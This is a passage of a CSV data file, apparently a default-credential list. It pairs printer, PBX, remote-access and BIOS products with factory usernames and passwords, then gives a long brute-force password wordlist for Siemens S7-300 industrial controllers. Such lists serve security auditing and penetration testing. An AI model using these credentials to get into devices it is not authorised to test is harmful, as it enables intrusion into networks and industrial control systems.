Interface,admin,Sharp,,,\nsharp,AR-M355N,,,admin,Sharp,Admin,,\nsharp,AR-M550,,,admin,Sharp,HTTP,,\nsharp,AR507/S507,,HTTP,,sysadm,,,\nsharp,FO-2081,,,admin,Sharp,Admin,,\nsharp,MX-2600N,,,,admin,,,\nsharp,MX-4501N,,HTTP,Administrator,admin,,,\nsharp,MX-5111N,,http,admin,admim,,,\nsharp,MX-M850,,,administrator,admin,,,\nsharp,MX-M850,,HTTP,admin,admin,,,\nshiva,AccessPort,,,hello,hello,,,\nshiva,AccessPort,,,hello,hello,,Any,\nshiva,Any?,,,Guest,blank,,,\nshiva,Integrator,,Admin,admin,hello,,,\nshiva,Integrator,150/200/500,Multi,admin,hello,Admin,,\nshiva,LanRover,,,guest,,,,\nshiva,LanRover,,,root,,,,\nshiva,ShivaPort,,console,admin,hello,Admin,,\nshoretel,Conference Bridge,,,Admin,admin1,,,\nshoretel,ShoreTel Call Manager,,,admin,changeme,,,\nshoretel,ShoreWare Director,,,admin,changeme,,,\nshuttle,PC BIOS,,,,Spacve,,,\nshuttle,PC BIOS,,,,Spacve,Admin,,\nshuttle,PC BIOS,,Admin,,Spacve,,,\nsiemens nixdorf,Hicom 100E PBX,,,31994,31994,,,\nsiemens nixdorf,Hicom 150E PBX,,,31994,31994,,,\nsiemens nixdorf,PBX,,8818,,uboot,,,\nsiemens nixdorf,PC BIOS,,,,SKY_FOX,,,\nsiemens nixdorf,PC BIOS,,Admin,,SKY_FOX,,,\nsiemens nixdorf,PhoneMail,,,poll,poll,,,\nsiemens nixdorf,PhoneMail,,,sysadmin,sysadmin,,,\nsiemens nixdorf,PhoneMail,,,system,system,,,\nsiemens nixdorf,PhoneMail,,,tech,tech,,,\nsiemens nixdorf,ROLM PBX,,,admin,pwp,,,\nsiemens nixdorf,ROLM PBX,,,eng,engineer,,,\nsiemens nixdorf,ROLM PBX,,,op,operator,,,\nsiemens nixdorf,ROLM PBX,,,su,super,,,\nsiemens s7-300,,,,,!MANAGE,,,\nsiemens s7-300,,,,,!manage,,,\nsiemens s7-300,,,,,$secure$,,,\nsiemens s7-300,,,,,'''''''',,,\nsiemens s7-300,,,,,''''''',,,\nsiemens s7-300,,,,,'''''',,,\nsiemens s7-300,,,,,''''',,,\nsiemens s7-300,,,,,'''',,,\nsiemens s7-300,,,,,''',,,\nsiemens s7-300,,,,,'',,,\nsiemens s7-300,,,,,',,,\nsiemens s7-300,,,,,********,,,\nsiemens s7-300,,,,,*******,,,\nsiemens s7-300,,,,,******,,,\nsiemens s7-300,,,,,*****,,,\nsiemens s7-300,,,,,****,,,\nsiemens s7-300,,,,,***,,,\nsiemens s7-300,,,,,**,,,\nsiemens s7-300,,,,,*,,,\nsiemens s7-300,,,,,++++++++,,,\nsiemens s7-300,,,,,+++++++,,,\nsiemens s7-300,,,,,++++++,,,\nsiemens s7-300,,,,,+++++,,,\nsiemens s7-300,,,,,++++,,,\nsiemens s7-300,,,,,+++,,,\nsiemens s7-300,,,,,++,,,\nsiemens s7-300,,,,,+,,,\nsiemens s7-300,,,,,,,,\nsiemens s7-300,,,,,,,,,\nsiemens s7-300,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,,\nsiemens s7-300,,,,,,,,,,,,,,,,\nsiemens s7-300,,,,,-,,,\nsiemens s7-300,,,,,--,,,\nsiemens s7-300,,,,,---,,,\nsiemens s7-300,,,,,----,,,\nsiemens s7-300,,,,,-----,,,\nsiemens s7-300,,,,,------,,,\nsiemens s7-300,,,,,-------,,,\nsiemens s7-300,,,,,--------,,,\nsiemens s7-300,,,,,.,,,\nsiemens s7-300,,,,,..,,,\nsiemens s7-300,,,,,...,,,\nsiemens s7-300,,,,,....,,,\nsiemens s7-300,,,,,.....,,,\nsiemens s7-300,,,,,......,,,\nsiemens s7-300,,,,,.......,,,\nsiemens s7-300,,,,,........,,,\nsiemens s7-300,,,,,/,,,\nsiemens s7-300,,,,,//,,,\nsiemens s7-300,,,,,///,,,\nsiemens s7-300,,,,,////,,,\nsiemens s7-300,,,,,/////,,,\nsiemens s7-300,,,,,//////,,,\nsiemens s7-300,,,,,///////,,,\nsiemens s7-300,,,,,////////,,,\nsiemens s7-300,,,,,0,,,\nsiemens s7-300,,,,,00,,,\nsiemens s7-300,,,,,000,,,\nsiemens s7-300,,,,,0000,,,\nsiemens s7-300,,,,,00000,,,\nsiemens s7-300,,,,,000000,,,\nsiemens s7-300,,,,,0000000,,,\nsiemens s7-300,,,,,00000000,,,\nsiemens s7-300,,,,,00000001,,,\nsiemens s7-300,,,,,0000001,,,\nsiemens s7-300,,,,,000001,,,\nsiemens s7-300,,,,,00001,,,\nsiemens s7-300,,,,,0001,,,\nsiemens s7-300,,,,,001,,,\nsiemens s7-300,,,,,050952,,,\nsiemens s7-300,,,,,0P3N,,,\nsiemens s7-300,,,,,1,,,\nsiemens s7-300,,,,,100,,,\nsiemens s7-300,,,,,1000,,,\nsiemens s7-300,,,,,10000,,,\nsiemens s7-300,,,,,100000,,,\nsiemens s7-300,,,,,1000000,,,\nsiemens s7-300,,,,,10000000,,,\nsiemens s7-300,,,,,10041979,,,\nsiemens s7-300,,,,,1064,,,\nsiemens s7-300,,,,,11,,,\nsiemens s7-300,,,,,111,,,\nsiemens s7-300,,,,,1111,,,\nsiemens s7-300,,,,,11111,,,\nsiemens s7-300,,,,,111111,,,\nsiemens s7-300,,,,,1111111,,,\nsiemens s7-300,,,,,11111111,,,\nsiemens s7-300,,,,,11112222,,,\nsiemens s7-300,,,,,112233,,,\nsiemens s7-300,,,,,11223344,,,\nsiemens s7-300,,,,,123,,,\nsiemens s7-300,,,,,123123,,,\nsiemens s7-300,,,,,12314500,,,\nsiemens s7-300,,,,,123321,,,\nsiemens s7-300,,,,,1234,,,\nsiemens s7-300,,,,,12344321,,,\nsiemens s7-300,,,,,12345,,,\nsiemens s7-300,,,,,123456,,,\nsiemens s7-300,,,,,1234567,,,\nsiemens s7-300,,,,,12345678,,,\nsiemens s7-300,,,,,12348765,,,\nsiemens s7-300,,,,,123654,,,\nsiemens s7-300,,,,,123ASD,,,\nsiemens s7-300,,,,,123QWE,,,\nsiemens s7-300,,,,,123asd,,,\nsiemens s7-300,,,,,123qwe,,,\nsiemens s7-300,,,,,1246,,,\nsiemens s7-300,,,,,128BIT,,,\nsiemens s7-300,,,,,128bit,,,\nsiemens s7-300,,,,,1313,,,\nsiemens s7-300,,,,,1502,,,\nsiemens s7-300,,,,,151298,,,\nsiemens s7-300,,,,,166816,,,\nsiemens s7-300,,,,,180497,,,\nsiemens s7-300,,,,,1890AGB,,,\nsiemens s7-300,,,,,1890agb,,,\nsiemens s7-300,,,,,1954,,,\nsiemens s7-300,,,,,1G2W3E,,,\nsiemens s7-300,,,,,1q2w3e,,,\nsiemens s7-300,,,,,2,,,\nsiemens s7-300,,,,,21,,,\nsiemens s7-300,,,,,21241036,,,\nsiemens s7-300,,,,,2128506,,,\nsiemens s7-300,,,,,22,,,\nsiemens s7-300,,,,,222,,,\nsiemens s7-300,,,,,2222,,,\nsiemens s7-300,,,,,22222,,,\nsiemens s7-300,,,,,222222,,,\nsiemens s7-300,,,,,2222222,,,\nsiemens s7-300,,,,,22222222,,,\nsiemens s7-300,,,,,266344,,,\nsiemens s7-300,,,,,281067,,,\nsiemens s7-300,,,,,281068,,,\nsiemens s7-300,,,,,2BW9,,,\nsiemens s7-300,,,,,2WSXcder,,,\nsiemens s7-300,,,,,3,,,\nsiemens s7-300,,,,,31994,,,\nsiemens s7-300,,,,,321,,,\nsiemens s7-300,,,,,33,,,\nsiemens s7-300,,,,,333,,,\nsiemens s7-300,,,,,3333,,,\nsiemens s7-300,,,,,33333,,,\nsiemens s7-300,,,,,333333,,,\nsiemens s7-300,,,,,3333333,,,\nsiemens s7-300,,,,,33333333,,,\nsiemens s7-300,,,,,3477,,,\nsiemens s7-300,,,,,355025,,,\nsiemens s7-300,,,,,3597,,,\nsiemens s7-300,,,,,3ASCOTEL,,,\nsiemens s7-300,,,,,3ORRO,,,\nsiemens s7-300,,,,,3WARE,,,\nsiemens s7-300,,,,,3ascotel,,,\nsiemens s7-300,,,,,3ep5w2u,,,\nsiemens s7-300,,,,,3orro,,,\nsiemens s7-300,,,,,3ware,,,\nsiemens s7-300,,,,,4,,,\nsiemens s7-300,,,,,42296795,,,\nsiemens s7-300,,,,,4321,,,\nsiemens s7-300,,,,,44,,,\nsiemens s7-300,,,,,444,,,\nsiemens s7-300,,,,,4444,,,\nsiemens s7-300,,,,,44444,,,\nsiemens s7-300,,,,,444444,,,\nsiemens s7-300,,,,,4444444,,,\nsiemens s7-300,,,,,44444444,,,\nsiemens s7-300,,,,,4ERT,,,\nsiemens s7-300,,,,,4G5K,,,\nsiemens s7-300,,,,,4G7S,,,\nsiemens s7-300,,,,,4TAS,,,\nsiemens s7-300,,,,,4ert,,,\nsiemens s7-300,,,,,4getme2,,,\nsiemens s7-300,,,,,4tas,,,\nsiemens s7-300,,,,,5,,,\nsiemens s7-300,,,,,5001,,,\nsiemens s7-300,,,,,5150,,,\nsiemens s7-300,,,,,5201314,,,\nsiemens s7-300,,,,,54321,,,\nsiemens s7-300,,,,,55,,,\nsiemens s7-300,,,,,55055,,,\nsiemens s7-300,,,,,555,,,\nsiemens s7-300,,,,,5555,,,\nsiemens s7-300,,,,,55555,,,\nsiemens s7-300,,,,,555555,,,\nsiemens s7-300,,,,,5555555,,,\nsiemens s7-300,,,,,55555555,,,\nsiemens s7-300,,,,,56789,,,\nsiemens s7-300,,,,,5693,,,\nsiemens s7-300,,,,,5777364,,,\nsiemens s7-300,,,,,5860,,,\nsiemens s7-300,,,,,589589,,,\nsiemens s7-300,,,,,6,,,\nsiemens s7-300,,,,,60587,,,\nsiemens s7-300,,,,,654321,,,\nsiemens s7-300,,,,,66,,,\nsiemens s7-300,,,,,666,,,\nsiemens s7-300,,,,,6666,,,\nsiemens s7-300,,,,,66666,,,\nsiemens s7-300,,,,,666666,,,\nsiemens s7-300,,,,,6666666,,,\nsiemens s7-300,,,,,66666666,,,\nsiemens s7-300,,,,,66808920,,,\nsiemens s7-300,,,,,6969,,,\nsiemens s7-300,,,,,7,,,\nsiemens s7-300,,,,,7654321,,,\nsiemens s7-300,,,,,77,,,\nsiemens s7-300,,,,,777,,,\nsiemens s7-300,,,,,7777,,,\nsiemens s7-300,,,,,77777,,,\nsiemens s7-300,,,,,777777,,,\nsiemens s7-300,,,,,7777777,,,\nsiemens s7-300,,,,,77777777,,,\nsiemens s7-300,,,,,7SH4,,,\nsiemens s7-300,,,,,8,,,\nsiemens s7-300,,,,,8111,,,\nsiemens s7-300,,,,,8429,,,\nsiemens s7-300,,,,,851141,,,\nsiemens s7-300,,,,,86844,,,\nsiemens s7-300,,,,,8746550,,,\nsiemens s7-300,,,,,87654321,,,\nsiemens s7-300,,,,,88,,,\nsiemens s7-300,,,,,888,,,\nsiemens s7-300,,,,,8888,,,\nsiemens s7-300,,,,,88888,,,\nsiemens s7-300,,,,,888888,,,\nsiemens s7-300,,,,,8888888,,,\nsiemens s7-300,,,,,88888888,,,\nsiemens s7-300,,,,,88981684,,,\nsiemens s7-300,,,,,9,,,\nsiemens s7-300,,,,,901100,,,\nsiemens s7-300,,,,,99,,,\nsiemens s7-300,,,,,999,,,\nsiemens s7-300,,,,,9999,,,\nsiemens s7-300,,,,,99999,,,\nsiemens s7-300,,,,,999999,,,\nsiemens s7-300,,,,,9999999,,,\nsiemens s7-300,,,,,99999999,,,\nsiemens s7-300,,,,,9W5K,,,\nsiemens s7-300,,,,,;,,,\nsiemens s7-300,,,,,;;,,,\nsiemens s7-300,,,,,;;;,,,\nsiemens s7-300,,,,,;;;;,,,\nsiemens s7-300,,,,,;;;;;,,,\nsiemens s7-300,,,,,;;;;;;,,,\nsiemens s7-300,,,,,;;;;;;;,,,\nsiemens s7-300,,,,,;;;;;;;;,,,\nsiemens s7-300,,,,,=,,,\nsiemens s7-300,,,,,==,,,\nsiemens s7-300,,,,,===,,,\nsiemens s7-300,,,,,====,,,\nsiemens s7-300,,,,,=====,,,\nsiemens s7-300,,,,,======,,,\nsiemens s7-300,,,,,=======,,,\nsiemens s7-300,,,,,========,,,\nsiemens s7-300,,,,,@#$123,,,\nsiemens s7-300,,,,,A,,,\nsiemens s7-300,,,,,A-POWER,,,\nsiemens s7-300,,,,,A/D,,,\nsiemens s7-300,,,,,AA,,,\nsiemens s7-300,,,,,AAA,,,\nsiemens s7-300,,,,,AAAA,,,\nsiemens s7-300,,,,,AAAAA,,,\nsiemens s7-300,,,,,AAAAAA,,,\nsiemens s7-300,,,,,AAAAAAA,,,\nsiemens s7-300,,,,,AAAAAAAA,,,\nsiemens s7-300,,,,,AABBCC,,,\nsiemens s7-300,,,,,AAEON,,,\nsiemens s7-300,,,,,AAVID,,,\nsiemens s7-300,,,,,AB,,,\nsiemens s7-300,,,,,ABB,,,\nsiemens s7-300,,,,,ABC,,,\nsiemens s7-300,,,,,ABC123,,,\nsiemens s7-300,,,,,ABCD,,,\nsiemens s7-300,,,,,ABCDE,,,\nsiemens s7-300,,,,,ABCDEF,,,\nsiemens s7-300,,,,,ABCDEFG,,,\nsiemens s7-300,,,,,ABCDEFGH,,,\nsiemens s7-300,,,,,ABELCONN,,,\nsiemens s7-300,,,,,ABOV,,,\nsiemens s7-300,,,,,ABRACON,,,\nsiemens s7-300,,,,,ABSOPULS,,,\nsiemens s7-300,,,,,ABTECH,,,\nsiemens s7-300,,,,,ABUNLOCK,,,\nsiemens s7-300,,,,,ACAM,,,\nsiemens s7-300,,,,,ACC,,,\nsiemens s7-300,,,,,ACCESS,,,\nsiemens s7-300,,,,,ACCORD,,,\nsiemens s7-300,,,,,ACON,,,\nsiemens s7-300,,,,,ACOPIAN,,,\nsiemens s7-300,,,,,ACP,,,\nsiemens s7-300,,,,,ACTEL,,,\nsiemens s7-300,,,,,ACTIVEX,,,\nsiemens s7-300,,,,,ADACTUS,,,\nsiemens s7-300,,,,,ADAM,,,\nsiemens s7-300,,,,,ADC,,,\nsiemens s7-300,,,,,ADDA,,,\nsiemens s7-300,,,,,ADELS,,,\nsiemens s7-300,,,,,ADFEXC,,,\nsiemens s7-300,,,,,ADI,,,\nsiemens s7-300,,,,,ADMIN,,,\nsiemens s7-300,,,,,ADMIN123,,,\nsiemens s7-300,,,,,ADMINTTD,,,\nsiemens s7-300,,,,,ADSLROOT,,,\nsiemens s7-300,,,,,ADTRAN,,,\nsiemens s7-300,,,,,ADVANCED,,,\nsiemens s7-300,,,,,ADVANTEC,,,\nsiemens s7-300,,,,,AEG MIS,,,\nsiemens s7-300,,,,,AEG,,,\nsiemens s7-300,,,,,AEM,,,\nsiemens s7-300,,,,,AEROFLEX,,,\nsiemens s7-300,,,,,AFT,,,\nsiemens s7-300,,,,,AITECH,,,\nsiemens s7-300,,,,,AKIWA,,,\nsiemens s7-300,,,,,ALBRIGHT,,,\nsiemens s7-300,,,,,ALCOR,,,\nsiemens s7-300,,,,,ALEPH,,,\nsiemens s7-300,,,,,ALFA'R,,,\nsiemens s7-300,,,,,ALFA,,,\nsiemens s7-300,,,,,ALFAMAG,,,\nsiemens s7-300,,,,,ALFATRON,,,\nsiemens s7-300,,,,,ALI,,,\nsiemens s7-300,,,,,ALL,,,\nsiemens s7-300,,,,,ALLEGRO,,,\nsiemens s7-300,,,,,ALLEN,,,\nsiemens s7-300,,,,,ALLIANCE,,,\nsiemens s7-300,,,,,ALLIED,,,\nsiemens s7-300,,,,,ALPINE,,,\nsiemens s7-300,,,,,ALPS,,,\nsiemens s7-300,,,,,ALTERA,,,\nsiemens s7-300,,,,,AMBER,,,\nsiemens s7-300,,,,,AMD,,,\nsiemens s7-300,,,,,AMERICAN,,,\nsiemens s7-300,,,,,AMETHERM,,,\nsiemens s7-300,,,,,AMI,,,\nsiemens s7-300,,,,,AMIC,,,\nsiemens s7-300,,,,,AMIS,,,\nsiemens s7-300,,,,,AMMC,,,\nsiemens s7-300,,,,,AMP,,,\nsiemens s7-300,,,,,AMPERITE,,,\nsiemens s7-300,,,,,AMPHENOL,,,\nsiemens s7-300,,,,,AMPIRE,,,\nsiemens s7-300,,,,,AMT,,,\nsiemens s7-300,,,,,ANACHIP,,,\nsiemens s7-300,,,,,ANADIGIC,,,\nsiemens s7-300,,,,,ANADIGM,,,\nsiemens s7-300,,,,,ANALOG,,,\nsiemens s7-300,,,,,ANALOGIC,,,\nsiemens s7-300,,,,,ANAREN,,,\nsiemens s7-300,,,,,ANGEL,,,\nsiemens s7-300,,,,,ANGLE,,,\nsiemens s7-300,,,,,ANICUST,,,\nsiemens s7-300,,,,,ANLA,,,\nsiemens s7-300,,,,,ANLEIM,,,\nsiemens s7-300,,,,,ANRITSU,,,\nsiemens s7-300,,,,,ANS#150,,,\nsiemens s7-300,,,,,ANSHAN,,,\nsiemens s7-300,,,,,ANSMANN,,,\nsiemens s7-300,,,,,ANYCOM,,,\nsiemens s7-300,,,,,ANYDATA,,,\nsiemens s7-300,,,,,ANYONE,,,\nsiemens s7-300,,,,,ANYWAY,,,\nsiemens s7-300,,,,,APBODIUR,,,\nsiemens s7-300,,,,,APC,,,\nsiemens s7-300,,,,,APEM,,,\nsiemens s7-300,,,,,APEX,,,\nsiemens s7-300,,,,,API,,,\nsiemens s7-300,,,,,APLUS,,,\nsiemens s7-300,,,,,APM,,,\nsiemens s7-300,,,,,APP,,,\nsiemens s7-300,,,,,APPLIED,,,\nsiemens s7-300,,,,,APRA,,,\nsiemens s7-300,,,,,ARSENAL,,,\nsiemens s7-300,,,,,ARTICON,,,\nsiemens s7-300,,,,,ASANTE,,,\nsiemens s7-300,,,,,ASCEND,,,\nsiemens s7-300,,,,,ASD,,,\nsiemens s7-300,,,,,ASDF,,,\nsiemens s7-300,,,,,ASDFG,,,\nsiemens s7-300,,,,,ASDFGH,,,\nsiemens s7-300,,,,,ASDFGHJ,,,\nsiemens s7-300,,,,,ASDFGHJK,,,\nsiemens s7-300,,,,,ASI,,,\nsiemens s7-300,,,,,ASUTP,,,\nsiemens s7-300,,,,,AT4400,,,\nsiemens s7-300,,,,,ATC,,,\nsiemens s7-300,,,,,ATC123,,,\nsiemens s7-300,,,,,ATLANTIS,,,\nsiemens s7-300,,,,,ATTACK,,,\nsiemens s7-300,,,,,AUTOHORS,,,\nsiemens s7-300,,,,,AZSXDC,,,\nsiemens s7-300,,,,,Aeroflex,,,\nsiemens s7-300,,,,,Anleim,,,\nsiemens s7-300,,,,,Asante,,,\nsiemens s7-300,,,,,Ascend,,,\nsiemens s7-300,,,,,B&R,,,\nsiemens s7-300,,,,,B,,,\nsiemens s7-300,,,,,B2H4,,,\nsiemens s7-300,,,,,B9W3,,,\nsiemens s7-300,,,,,BACK,,,\nsiemens s7-300,,,,,BACKDOOR,,,\nsiemens s7-300,,,,,BADBOY,,,\nsiemens s7-300,,,,,BARRICADE,,,\nsiemens s7-300,,,,,BASEBALL,,,\nsiemens s7-300,,,,,BB,,,\nsiemens s7-300,,,,,BBB,,,\nsiemens s7-300,,,,,BBBB,,,\nsiemens s7-300,,,,,BBBBB,,,\nsiemens s7-300,,,,,BBBBBB,,,\nsiemens s7-300,,,,,BBBBBBB,,,\nsiemens s7-300,,,,,BBBBBBBB,,,\nsiemens s7-300,,,,,BCIIMPW,,,\nsiemens s7-300,,,,,BCIMPW,,,\nsiemens s7-300,,,,,BCNASPW,,,\nsiemens s7-300,,,,,BEATCH,,,\nsiemens s7-300,,,,,BEERBEER,,,\nsiemens s7-300,,,,,BETERA,,,\nsiemens s7-300,,,,,BIBLE,,,\nsiemens s7-300,,,,,BINTEC,,,\nsiemens s7-300,,,,,BIRDIE,,,\nsiemens s7-300,,,,,BLACK,,,\nsiemens s7-300,,,,,BLASTER,,,\nsiemens s7-300,,,,,BLENDER,,,\nsiemens s7-300,,,,,BLINK,,,\nsiemens s7-300,,,,,BLINK182,,,\nsiemens s7-300,,,,,BLUEPW,,,\nsiemens s7-300,,,,,BOWLING,,,\nsiemens s7-300,,,,,BRADLEY,,,\nsiemens s7-300,,,,,BRIDGE,,,\nsiemens s7-300,,,,,BRIGHT,,,\nsiemens s7-300,,,,,C,,,\nsiemens s7-300,,,,,CA01,,,\nsiemens s7-300,,,,,CACADMIN,,,\nsiemens s7-300,,,,,CACTUS,,,\nsiemens s7-300,,,,,CALVIN,,,\nsiemens s7-300,,,,,CAN,,,\nsiemens s7-300,,,,,CANBUS,,,\nsiemens s7-300,,,,,CAROLIAN,,,\nsiemens s7-300,,,,,CASCADE,,,\nsiemens s7-300,,,,,CC,,,\nsiemens s7-300,,,,,CCC,,,\nsiemens s7-300,,,,,CCCC,,,\nsiemens s7-300,,,,,CCCCC,,,\nsiemens s7-300,,,,,CCCCCC,,,\nsiemens s7-300,,,,,CCCCCCC,,,\nsiemens s7-300,,,,,CCCCCCCC,,,\nsiemens s7-300,,,,,CCRUSR,,,\nsiemens s7-300,,,,,CELLIT,,,\nsiemens s7-300,,,,,CFC,,,\nsiemens s7-300,,,,,CHABGEME,,,\nsiemens s7-300,,,,,CHANGEME,,,\nsiemens s7-300,,,,,CHANGIT,,,\nsiemens s7-300,,,,,CHARLIE,,,\nsiemens s7-300,,,,,CISCO,,,\nsiemens s7-300,,,,,CITEL,,,\nsiemens s7-300,,,,,CLIENT,,,\nsiemens s7-300,,,,,CMAKER,,,\nsiemens s7-300,,,,,CMS500,,,\nsiemens s7-300,,,,,CNAS,,,\nsiemens s7-300,,,,,CODY,,,\nsiemens s7-300,,,,,COGNOS,,,\nsiemens s7-300,,,,,COMPUTER,,,\nsiemens s7-300,,,,,CONNECT,,,\nsiemens s7-300,,,,,CONV,,,\nsiemens s7-300,,,,,COOL,,,\nsiemens s7-300,,,,,CORECESS,,,\nsiemens s7-300,,,,,COSMOS,,,\nsiemens s7-300,,,,,CRAFT,,,\nsiemens s7-300,,,,,CRAFTPW,,,\nsiemens s7-300,,,,,CRFTPW,,,\nsiemens s7-300,,,,,CRYSTAL,,,\nsiemens s7-300,,,,,CUSTOMER,,,\nsiemens s7-300,,,,,CUSTPW,,,\nsiemens s7-300,,,,,Cisco,,,\nsiemens s7-300,,,,,Col2ogro2,,,\nsiemens s7-300,,,,,D,,,\nsiemens s7-300,,,,,D-Link,,,\nsiemens s7-300,,,,,D00M,,,\nsiemens s7-300,,,,,DADMIN01,,,\nsiemens s7-300,,,,,DANGER,,,\nsiemens s7-300,,,,,DATABASE,,,\nsiemens s7-300,,,,,DBPS,,,\nsiemens s7-300,,,,,DD,,,\nsiemens s7-300,,,,,DDD,,,\nsiemens s7-300,,,,,DDDD,,,\nsiemens s7-300,,,,,DDDDD,,,\nsiemens s7-300,,,,,DDDDDD,,,\nsiemens s7-300,,,,,DDDDDDD,,,\nsiemens s7-300,,,,,DDDDDDDD,,,\nsiemens s7-300,,,,,DEAN,,,\nsiemens s7-300,,,,,DEFAULT,,,\nsiemens s7-300,,,,,DEMO,,,\nsiemens s7-300,,,,,DENISE,,,\nsiemens s7-300,,,,,DERPAROL,,,\nsiemens s7-300,,,,,DEVEVAN,,,\nsiemens s7-300,,,,,DEVICE,,,\nsiemens s7-300,,,,,DEVICES,,,\nsiemens s7-300,,,,,DHS3MT,,,\nsiemens s7-300,,,,,DHS3PMS,,,\nsiemens s7-300,,,,,DIABL0,,,\nsiemens s7-300,,,,,DIABLO,,,\nsiemens s7-300,,,,,DIAMOND,,,\nsiemens s7-300,,,,,DIGITAL,,,\nsiemens s7-300,,,,,DL20,,,\nsiemens s7-300,,,,,DLINK,,,\nsiemens s7-300,,,,,DOLLAR,,,\nsiemens s7-300,,,,,DOOM,,,\nsiemens s7-300,,,,,DRAADLOOS,,,\nsiemens s7-300,,,,,DRIVEES,,,\nsiemens s7-300,,,,,E,,,\nsiemens s7-300,,,,,ECHO,,,\nsiemens s7-300,,,,,EE,,,\nsiemens s7-300,,,,,EEE,,,\nsiemens s7-300,,,,,EEEE,,,\nsiemens s7-300,,,,,EEEEE,,,\nsiemens s7-300,,,,,EEEEEE,,,\nsiemens s7-300,,,,,EEEEEEE,,,\nsiemens s7-300,,,,,EEEEEEEE,,,\nsiemens s7-300,,,,,EGDFV,,,\nsiemens s7-300,,,,,ELECTRIN,,,\nsiemens s7-300,,,,,ELVIS,,,\nsiemens s7-300,,,,,ENABLE,,,\nsiemens s7-300,,,,,ENERGY,,,\nsiemens s7-300,,,,,ENGINEER,,,\nsiemens s7-300,,,,,ERR0R,,,\nsiemens s7-300,,,,,EVENING,,,\nsiemens s7-300,,,,,EXABYTE,,,\nsiemens s7-300,,,,,EXPERT03,,,\nsiemens s7-300,,,,,Exabyte,,,\nsiemens s7-300,,,,,F,,,\nsiemens s7-300,,,,,FATHER,,,\nsiemens s7-300,,,,,FBD,,,\nsiemens s7-300,,,,,FF,,,\nsiemens s7-300,,,,,FFF,,,\nsiemens s7-300,,,,,FFFF,,,\nsiemens s7-300,,,,,FFFFF,,,\nsiemens s7-300,,,,,FFFFFF,,,\nsiemens s7-300,,,,,FFFFFFF,,,\nsiemens s7-300,,,,,FFFFFFFF,,,\nsiemens s7-300,,,,,FIELD,,,\nsiemens s7-300,,,,,FIRE,,,\nsiemens s7-300,,,,,FIREPORT,,,\nsiemens s7-300,,,,,FISH,,,\nsiemens s7-300,,,,,FIVRANNE,,,\nsiemens s7-300,,,,,FLASH,,,\nsiemens s7-300,,,,,FLEX,,,\nsiemens s7-300,,,,,FLEXIBLE,,,\nsiemens s7-300,,,,,FOOTBALL,,,\nsiemens s7-300,,,,,FRIEND,,,\nsiemens s7-300,,,,,FUCK,,,\nsiemens s7-300,,,,,FUCKOFF,,,\nsiemens s7-300,,,,,FUCKYOU,,,\nsiemens s7-300,,,,,Fireport,,,\nsiemens s7-300,,,,,G,,,\nsiemens s7-300,,,,,G00GLE,,,\nsiemens s7-300,,,,,G0F9,,,\nsiemens s7-300,,,,,G0K1,,,\nsiemens s7-300,,,,,G6K6,,,\nsiemens s7-300,,,,,GAMA,,,\nsiemens s7-300,,,,,GAWSED,,,\nsiemens s7-300,,,,,GEARDOG,,,\nsiemens s7-300,,,,,GFCC,,,\nsiemens s7-300,,,,,GFCCDJHL,,,\nsiemens s7-300,,,,,GFHJKM,,,\nsiemens s7-300,,,,,GG,,,\nsiemens s7-300,,,,,GGG,,,\nsiemens s7-300,,,,,GGGG,,,\nsiemens s7-300,,,,,GGGGG,,,\nsiemens s7-300,,,,,GGGGGG,,,\nsiemens s7-300,,,,,GGGGGGG,,,\nsiemens s7-300,,,,,GGGGGGGG,,,\nsiemens s7-300,,,,,GHBDTN,,,\nsiemens s7-300,,,,,GHOST,,,\nsiemens s7-300,,,,,GOAL,,,\nsiemens s7-300,,,,,GOLF,,,\nsiemens s7-300,,,,,GOOGLE,,,\nsiemens s7-300,,,,,GOT,,,\nsiemens s7-300,,,,,GUEST,,,\nsiemens s7-300,,,,,Geardog,,,\nsiemens s7-300,,,,,H,,,\nsiemens s7-300,,,,,HARDWARE,,,\nsiemens s7-300,,,,,HELEN,,,\nsiemens s7-300,,,,,HELLO,,,\nsiemens s7-300,,,,,HELP,,,\nsiemens s7-300,,,,,HELP1954,,,\nsiemens s7-300,,,,,HELPDESK,,,\nsiemens s7-300,,,,,HEXSEAL,,,\nsiemens s7-300,,,,,HH,,,\nsiemens s7-300,,,,,HHH,,,\nsiemens s7-300,,,,,HHHH,,,\nsiemens s7-300,,,,,HHHHH,,,\nsiemens s7-300,,,,,HHHHHH,,,\nsiemens s7-300,,,,,HHHHHHH,,,\nsiemens s7-300,,,,,HHHHHHHH,,,\nsiemens s7-300,,,,,HIGHSPEED,,,\nsiemens s7-300,,,,,HINEAR,,,\nsiemens s7-300,,,,,HOME,,,\nsiemens s7-300,,,,,HOMEPLUG,,,\nsiemens s7-300,,,,,HONDA,,,\nsiemens s7-300,,,,,HP,,,\nsiemens s7-300,,,,,HPOFFICE,,,\nsiemens s7-300,,,,,HPONLY,,,\nsiemens s7-300,,,,,HPP187,,,\nsiemens s7-300,,,,,HPP189,,,\nsiemens s7-300,,,,,HPP196,,,\nsiemens s7-300,,,,,HRLOO,,,\nsiemens s7-300,,,,,HTTP,,,\nsiemens s7-300,,,,,Helpdesk,,,\nsiemens s7-300,,,,,HomePlug,,,\nsiemens s7-300,,,,,I,,,\nsiemens s7-300,,,,,IDIRECT,,,\nsiemens s7-300,,,,,II,,,\nsiemens s7-300,,,,,III,,,\nsiemens s7-300,,,,,IIII,,,\nsiemens s7-300,,,,,IIIII,,,\nsiemens s7-300,,,,,IIIIII,,,\nsiemens s7-300,,,,,IIIIIII,,,\nsiemens s7-300,,,,,IIIIIIII,,,\nsiemens s7-300,,,,,ILMI,,,\nsiemens s7-300,,,,,ILOVEYOU,,,\nsiemens s7-300,,,,,IMAGES,,,\nsiemens s7-300,,,,,INADS,,,\nsiemens s7-300,,,,,INC,,,\nsiemens s7-300,,,,,INDSPW,,,\nsiemens s7-300,,,,,INFERNO,,,\nsiemens s7-300,,,,,INITPW,,,\nsiemens s7-300,,,,,INMET,,,\nsiemens s7-300,,,,,INTEL,,,\nsiemens s7-300,,,,,INTERNET,,,\nsiemens s7-300,,,,,INTX3,,,\nsiemens s7-300,,,,,IRONPORT,,,\nsiemens s7-300,,,,,ISEE,,,\nsiemens s7-300,,,,,ISP,,,\nsiemens s7-300,,,,,ITF3000,,,\nsiemens s7-300,,,,,Inmet,,,\nsiemens s7-300,,,,,Intel,,,\nsiemens s7-300,,,,,Internet,,,\nsiemens 